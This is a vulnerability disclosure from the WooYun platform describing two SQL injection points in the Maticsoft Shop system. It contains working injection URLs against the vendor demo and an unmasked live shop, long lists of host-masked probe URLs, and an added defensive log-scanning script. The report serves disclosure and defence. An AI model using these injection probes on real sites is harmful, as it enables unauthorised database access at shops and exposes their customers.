
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0146836

Title: Two SQL injections in the 动软 (Maticsoft) Shop system, affecting a large number of shop sites (100+ cases)

Vendor: 动软卓越(北京)科技有限公司 (Maticsoft Excellence (Beijing) Technology Co., Ltd.)

Author: 路人甲

Submitted: 2015-10-15 11:25

Fix time: 2015-11-29 11:26

Published: 2015-11-29 11:26

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-15: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-11-29: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A fairly well-known shop system

Detailed description:

Honestly, I wrote up this many cases just to get onto the front page, hehe~
Everyone surely knows this shop system is quite well known and widely used. I can't possibly list every case~
Injection point:

/NodeProdCategory.aspx?action=GetChildNode&CategoryId=1


Take a look at the official demo:
http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%27
A plainly obvious MSSQL injection; a very small number of sites run MySQL and are injectable there too

1.jpg


Extracting the database version:
http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20@@version>0--

3.jpg


Let's look at the user too; you can inject however you like:
http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20user>0--

4.jpg


Caught one MySQL injection:
http://www.syltmall.com/NodeProdCategory.aspx?action=GetChildNode&CategoryId=1'

2.jpg
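As an added example (not part of the original report and not the vendor's code), the following Python script shows the detection a defender could run over IIS W3C logs for both handlers named in this report, /NodeProdCategory.aspx (CategoryId) and /EditPhotoHandle.aspx (PhotoId): every request in which one of those integer id parameters holds anything other than plain digits is flagged after percent-decoding, which catches both the `2%27` probe and the `@@version` probes shown above regardless of how they are encoded. The log excerpt, its field layout, the hosts and the addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Handlers named in the report and the id parameter each one takes; keys are
# lowercase path tails (this monitoring scope is an assumption of the example).
MONITORED = {
    "/nodeprodcategory.aspx": {"categoryid"},
    "/editphotohandle.aspx": {"photoid"},
}

# A legitimate id is a short run of ASCII digits; anything else on these
# parameters is worth an alert.
PLAIN_ID = re.compile(r"[0-9]{1,9}")

# Constructed IIS W3C log excerpt (hosts, addresses and times are made up);
# cs-uri-query is logged raw, i.e. still percent-encoded.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-10-14 08:00:01 10.0.0.5 GET /NodeProdCategory.aspx action=GetChildNode&CategoryId=1 203.0.113.7 200
2015-10-14 08:00:09 10.0.0.5 GET /NodeProdCategory.aspx action=GetChildNode&CategoryId=2%27 203.0.113.7 500
2015-10-14 08:00:15 10.0.0.5 GET /NodeProdCategory.aspx action=GetChildNode&CategoryId=2%20and%20@@version%3E0-- 203.0.113.7 500
2015-10-14 08:01:02 10.0.0.5 GET /EditPhotoHandle.aspx Action=EditCover&PhotoId=1%20and%20@@version>0-- 203.0.113.7 500
2015-10-14 08:01:30 10.0.0.5 GET /Default.aspx - 198.51.100.2 200
2015-10-14 08:02:00 10.0.0.5 GET /EditPhotoHandle.aspx Action=EditCover&PhotoId=17 198.51.100.2 200
"""


def parse_w3c(text):
    """Yield one dict per request line, taking field names from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than guess at the columns
        yield dict(zip(fields, values))


def find_injection_attempts(text):
    """Flag requests whose integer id parameter carries anything but digits."""
    findings = []
    for rec in parse_w3c(text):
        path = rec["cs-uri-stem"].lower()
        watched = None
        for tail, params in MONITORED.items():
            if path.endswith(tail):
                watched = params
        if watched is None:
            continue
        query = rec["cs-uri-query"]
        if query == "-":  # IIS writes '-' for an empty query string
            continue
        # parse_qs percent-decodes, so '%27' and '%3E' come back as "'" and '>'
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name.lower() not in watched:
                continue
            for value in values:
                if not PLAIN_ID.fullmatch(value):
                    findings.append({
                        "time": f'{rec["date"]} {rec["time"]}',
                        "client": rec["c-ip"],
                        "path": rec["cs-uri-stem"],
                        "param": name,
                        "value": value,
                        "status": rec["sc-status"],
                    })
    return findings


def count_by_client(findings):
    """Attempts per source address, the usual pivot for a first triage."""
    return dict(Counter(f["client"] for f in findings))


if __name__ == "__main__":
    hits = find_injection_attempts(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(count_by_client(hits))
```

On the constructed excerpt the scan returns three findings, all from the same client, and leaves the two legitimate integer requests alone. Alerting on "not a plain integer" rather than on a keyword list is deliberate: it needs no signature for each new probe, and the 500 status on the flagged lines is the same error-based signal the screenshots in this report show.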


121 cases offered as proof:

masked area
1.http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--  官方demo_
2.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
3.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
4.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
5.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
6.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
7.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
8.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
9.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
10.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
11.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
12.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
13.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
14.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
15.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
16.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
17.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
18.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version>0--_
19.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1&
20.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version>0--_
21.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--_
22.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--_
23.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
24.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
**********
25.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
26.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
27.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
28.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
29.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
30.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
31.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
32.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
33.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
34.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
35.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
36.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
37.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
38.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
39.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
40.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
41.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
42.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
43.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
44.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
45.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
46.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
47.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
48.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
49.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
50.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
51.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
52.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
53.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
54.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
55.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
56.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
57.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
58.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
59.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
60.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
61.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
62.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
63.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
64.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
65.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
66.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
67.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
68.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
69.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
70.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
71.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
72.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
73.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
74.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
75.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
76.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
77.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
78.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
79.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
80.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
81.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
82.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
83.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
84.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
85.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
86.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
87.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
88.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
89.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
90.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
91.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
92.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
93.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
94.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
95.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
96.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
97.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
98.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
99.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
100.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
101.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
102.http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
103.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
104.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
105.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
106.http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
107.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
108.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
109.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
110.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
111.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
112.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
113.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
114.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
115.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
116.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
117.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
118.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
119.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
120.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
121.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_
122.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--


Injection point two:

/EditPhotoHandle.aspx?Action=EditCover&PhotoId=1


1.jpg


Test cases:

masked area
1.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
2.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
3.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
4.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
5.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
6.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
7.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
8.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
9.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
10.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
11.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
12.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
13.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
14.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
15.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
16.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
17.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version>0--_
18.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1&
19.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version>0--_
20.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--_
21.http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version>0--_
22.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
23.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
24.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
25.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
26.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
27.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
28.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
29.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
30.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
31.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
32.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
33.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
34.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
35.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
36.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
37.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
38.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
39.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
40.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
41.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
42.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
43.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
44.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
45.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
46.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
47.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
48.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
49.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
50.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
51.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
52.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
53.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
54.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
55.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
56.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
57.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
58.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
59.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
60.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
61.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
62.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
63.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
64.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
65.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
66.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
67.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
68.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
69.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
70.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
71.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
72.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
73.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
74.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
75.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
76.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
77.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
78.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
79.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
80.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
81.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
82.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
83.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
84.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
85.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
86.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
87.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
88.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
89.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
90.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
91.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
92.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
93.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
94.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
95.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
96.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
97.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
98.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
99.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
100.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
101.http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
102.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
103.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
104.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
105.http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
106.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
107.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
108.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
109.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
110.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
111.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
112.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
113.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
114.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
